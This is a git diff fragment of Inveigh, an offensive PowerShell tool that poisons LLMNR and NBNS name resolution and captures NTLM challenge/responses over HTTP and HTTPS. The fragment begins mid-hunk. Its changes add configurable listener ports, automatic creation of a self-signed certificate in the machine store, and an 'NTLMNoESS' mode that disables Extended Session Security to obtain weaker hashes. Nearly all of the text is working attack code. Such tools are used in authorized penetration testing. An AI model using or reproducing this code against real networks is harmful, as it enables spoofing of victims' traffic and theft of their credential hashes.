if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now
@@ -1287,12 +1342,25 @@ $NBNS_spoofer_scriptblock =
{
param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL)
+ $NBNS_running = $true
$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
- $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+
+ try
+ {
+ $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+ }
+ catch
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")])
+ $NBNS_running = $false
+ }
+
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- while($inveigh.unprivileged_running)
+ while($inveigh.unprivileged_running -and $NBNS_running)
{
+
$NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async
if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01')
@@ -1970,7 +2038,7 @@ if($inveigh)
if($inveigh.unprivileged_running)
{
$inveigh.unprivileged_running = $false
- Start-Sleep -s 5
+ Start-Sleep -S 2
Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
@@ -1984,6 +2052,7 @@ if($inveigh)
if($inveigh.relay_running)
{
$inveigh.relay_running = $false
+ Start-Sleep -S 2
Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
@@ -2015,27 +2084,45 @@ if($inveigh)
if($inveigh.HTTPS)
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ $certificate_check = & "netsh" http show sslcert
- try
+ if($certificate_check)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port
+ $netsh_arguments = @("http","delete","sslcert",$netsh_ipport)
+ & "netsh" $netsh_arguments > $null
}
- catch
+
+ if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
+ try
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+
+ if($inveigh.file_output)
+ {
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ }
+
}
}
+
}
$inveigh.HTTP = $false
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 8c7437f..92b8982 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -41,11 +41,11 @@ LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is recei
hostname to a spoofing blacklist.
.PARAMETER SpooferLearningDelay
-(Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
+(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
SpooferLearning.
.PARAMETER SpooferLearningInterval
-Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a
+Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a
hostname that has already been checked if SpooferLearning is enabled.
.PARAMETER SpooferRepeat
@@ -71,17 +71,15 @@ Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Serv
.PARAMETER HTTP
Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-.PARAMETER HTTPS
-Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store and attached to port 443. If the script does not exit gracefully, execute
-"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
-in the cert store.
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP/HTTPS listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
-wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A
-WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
-connecting to the root of the web server.
+Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
.PARAMETER HTTPBasicRealm
Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
@@ -100,16 +98,26 @@ EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for
String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
-.PARAMETER HTTPSCertAppID
-Valid application GUID for use with the ceriticate.
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store and attached to port specified IP and port. If the script does not exit gracefully, execute
+"netsh http delete sslcert ipport=" with the correct IP and port and manually remove the certificate.
+
+.PARAMETER HTTPSPort
+Default = 443: TCP port for the HTTPS listener.
+
+.PARAMETER HTTPSCertIssuer
+Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSCertSubject
+Default = localhost: The subject field for the cert that will be installed for HTTPS.
-.PARAMETER HTTPSCertThumbprint
-Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
-working directory and named Inveigh.pfx.
+.PARAMETER HTTPSForceCertDelete
+Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
.PARAMETER WPADEmptyFile
Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
@@ -178,6 +186,9 @@ also be enabled.
.PARAMETER RunTime
(Integer) Run time duration in minutes.
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -240,6 +251,7 @@ param
(
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
@@ -254,11 +266,13 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
@@ -269,6 +283,8 @@ param
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
[parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
@@ -280,8 +296,8 @@ param
[parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
[parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "",
[parameter(Mandatory=$false)][String]$HTTPResponse = "",
- [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
- [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+ [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
+ [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
@@ -289,7 +305,8 @@ param
if ($invalid_parameter)
{
- throw "$($invalid_parameter) is not a valid parameter."
+ Write-Output "Error:$($invalid_parameter) is not a valid parameter"
+ throw
}
if(!$IP)
@@ -307,7 +324,8 @@ if($HTTPDefaultFile -or $HTTPDefaultEXE)
if(!$HTTPDir)
{
- throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+ Write-Output "Error:You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+ throw
}
}
@@ -317,12 +335,14 @@ if($WPADIP -or $WPADPort)
if(!$WPADIP)
{
- throw "You must specify a -WPADPort to go with -WPADIP"
+ Write-Output "Error:You must specify a -WPADPort to go with -WPADIP"
+ throw
}
if(!$WPADPort)
{
- throw "You must specify a -WPADIP to go with -WPADPort"
+ Write-Output "Error:You must specify a -WPADIP to go with -WPADPort"
+ throw
}
}
@@ -352,7 +372,8 @@ if(!$inveigh)
if($inveigh.running)
{
- throw "Invoke-Inveigh is already running, use Stop-Inveigh"
+ Write-Output "Error:Invoke-Inveigh is already running, use Stop-Inveigh"
+ throw
}
$inveigh.sniffer_socket = $null
@@ -372,11 +393,11 @@ if(!$inveigh.relay_running -or !$inveigh.unprivileged_running)
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.certificate_application_ID = $HTTPSCertAppID
- $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
$inveigh.console_output = $false
$inveigh.console_input = $true
$inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
@@ -438,11 +459,22 @@ else
$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
-$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+if($StartupChecks -eq 'Y')
+{
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
if($firewall_status)
{
$inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+ $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+ $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+ if($firewall_powershell)
+ {
+ $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
+ }
+
}
$inveigh.status_queue.Add("Listening IP Address = $IP") > $null
@@ -551,16 +583,31 @@ else
if($HTTP -eq 'Y')
{
-
- $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80
+
+ if($StartupChecks -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+ }
if($HTTP_port_check)
{
+ $HTTP = "N"
$inveigh.HTTP = $false
- $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null
+ $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
+
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $inveigh.status_queue.Add("HTTP IP = $HTTPIP") > $null
+ }
+
+ if($HTTPPort -ne 80)
+ {
+ $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
+ }
+
$inveigh.HTTP = $true
$inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
}
@@ -574,38 +621,106 @@ else
if($HTTPS -eq 'Y')
{
-
- $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443
+
+ if($StartupChecks -eq 'Y')
+ {
+ $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
+ }
if($HTTPS_port_check)
{
- $inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
}
else
{
try
- {
- $inveigh.HTTPS = $true
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
- $certificate.Import($PWD.Path + "\Inveigh.pfx")
- $certificate_store.Add($certificate)
- $certificate_store.Close()
- $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
- $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
- $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
+ {
+ $inveigh.certificate_issuer = $HTTPSCertIssuer
+ $inveigh.certificate_CN = $HTTPSCertSubject
+ $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ if(!$certificate_check)
+ {
+ # credit to subTee for cert creation code https://github.com/subTee/Interceptor
+ $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
+ $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
+ $certificate_key.KeySpec = 2
+ $certificate_key.Length = 2048
+ $certificate_key.MachineContext = 1
+ $certificate_key.Create()
+ $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
+ $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
+ $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
+ $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
+ $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
+ $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
+ $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
+ $certificate.Subject = $certificate_distinguished_name
+ $certificate.Issuer = $certificate_issuer_distinguished_name
+ $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
+ $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
+ $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
+ $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
+ $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
+ $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
+ $certificate_basic_constraints.InitializeEncode("true",1)
+ $certificate.X509Extensions.Add($certificate_basic_constraints)
+ $certificate.Encode()
+ $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
+ $certificate_enrollment.InitializeFromRequest($certificate)
+ $certificate_data = $certificate_enrollment.CreateRequest(0)
+ $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
+ }
+ else
+ {
+
+ if($HTTPSForceCertDelete -eq 'Y')
+ {
+ $inveigh.HTTPS_force_certificate_delete = $true
+ }
+
+ $inveigh.HTTPS_existing_certificate = $true
+ $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
+ }
+
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+ $netsh_certhash = "certhash=" + $certificate_check.thumbprint
+ $netsh_app_ID = "appid={00112233-4455-6677-8899-AABBCCDDEEFF}"
+ $netsh_arguments = @("http","add","sslcert","ipport=$HTTPIP`:$HTTPSPort",$netsh_certhash,$netsh_app_ID)
& "netsh" $netsh_arguments > $null
+ $inveigh.HTTPS = $true
+ $inveigh.HTTPS_IP = $HTTPIP
+ $inveigh.HTTPS_port = $HTTPSPort
+
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $inveigh.status_queue.Add("HTTPS IP = $HTTPIP") > $null
+ }
+
+ if($HTTPSPort -ne 443)
+ {
+ $inveigh.status_queue.Add("HTTPS Port = $HTTPSPort") > $null
+ }
+
$inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null
+
}
catch
{
- $certificate_store.Close()
- $HTTPS="N"
+ $HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null
+ $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Error") > $null
}
}
@@ -616,7 +731,7 @@ else
$inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null
}
-if($inveigh.HTTP -or $inveigh.HTTPS)
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
$inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null
$inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
@@ -1011,8 +1126,8 @@ $HTTP_scriptblock =
function NTLMChallengeBase64
{
- param ([String]$Challenge)
-
+ param ([String]$Challenge,[Bool]$NTLMESS)
+
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
@@ -1033,8 +1148,18 @@ $HTTP_scriptblock =
$inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null
+ if($NTLMESS)
+ {
+ $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a
+ }
+ else
+ {
+ $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a
+ }
+
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa +
+ 0x00,0x00,0x00 +
+ $HTTP_NTLM_negotiation_flags +
$HTTP_challenge_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
@@ -1049,9 +1174,10 @@ $HTTP_scriptblock =
0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = $null
$NTLM = 'NTLM ' + $NTLM_challenge_base64
$NTLM_challenge = $HTTP_challenge
-
+
return $NTLM
}
@@ -1074,8 +1200,10 @@ $HTTP_scriptblock =
{
$HTTP_type = "HTTP"
}
+
+ $HTTP_request_raw_url = $inveigh.request.RawUrl
- if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ if($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
{
$inveigh.response.StatusCode = 200
}
@@ -1084,10 +1212,19 @@ $HTTP_scriptblock =
$inveigh.response.StatusCode = 401
}
+ if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM'))
+ {
+ $HTTPNTLMESS = $true
+ }
+ else
+ {
+ $HTTPNTLMESS = $false
+ }
+
$HTTP_request_time = Get-Date -format 's'
$HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString
- if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old)
+ if($HTTP_request_time -eq $HTTP_request_time_old -and $HTTP_request_raw_url -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old)
{
$HTTP_raw_url_output = $false
}
@@ -1098,11 +1235,11 @@ $HTTP_scriptblock =
if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
{
- $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")])
+ $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for $HTTP_request_raw_url received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for $HTTP_request_raw_url received from $HTTP_source_IP")])
}
- $HTTP_request_raw_url_old = $inveigh.request.RawUrl
+ $HTTP_request_raw_url_old = $HTTP_request_raw_url
$HTTP_request_remote_endpoint_old = $HTTP_source_IP
$HTTP_request_time_old = $HTTP_request_time
@@ -1117,7 +1254,7 @@ $HTTP_scriptblock =
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$inveigh.response.StatusCode = 401
- $NTLM = NTLMChallengeBase64 $Challenge
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
@@ -1252,34 +1389,34 @@ $HTTP_scriptblock =
}
- if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
+ if(($HTTPAuth -eq 'Anonymous' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $HTTP_request_raw_url -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
{
- if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)))
+ if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)))
{
[Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE))
}
elseif($HTTPDir)
{
- if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
+ if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $HTTP_request_raw_url -notmatch '/wpad.dat')
{
[Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
- elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
+ elseif($HTTPDefaultFile -and $HTTP_request_raw_url -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
{
[Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
- elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat')
+ elseif($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat')
{
[Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse)
}
else
{
- if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))
+ if(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url))
{
- [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $inveigh.request.RawUrl))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTP_request_raw_url))
}
else
{
@@ -1292,7 +1429,7 @@ $HTTP_scriptblock =
else
{
- if($inveigh.request.RawUrl -match '/wpad.dat')
+ if($HTTP_request_raw_url -match '/wpad.dat')
{
$inveigh.message = $WPADResponse
}
@@ -1313,11 +1450,11 @@ $HTTP_scriptblock =
[Byte[]]$HTTP_buffer = $null
}
- if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth)
+ if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_url -match '/wpad.dat') -and !$NTLM_auth)
{
$inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
}
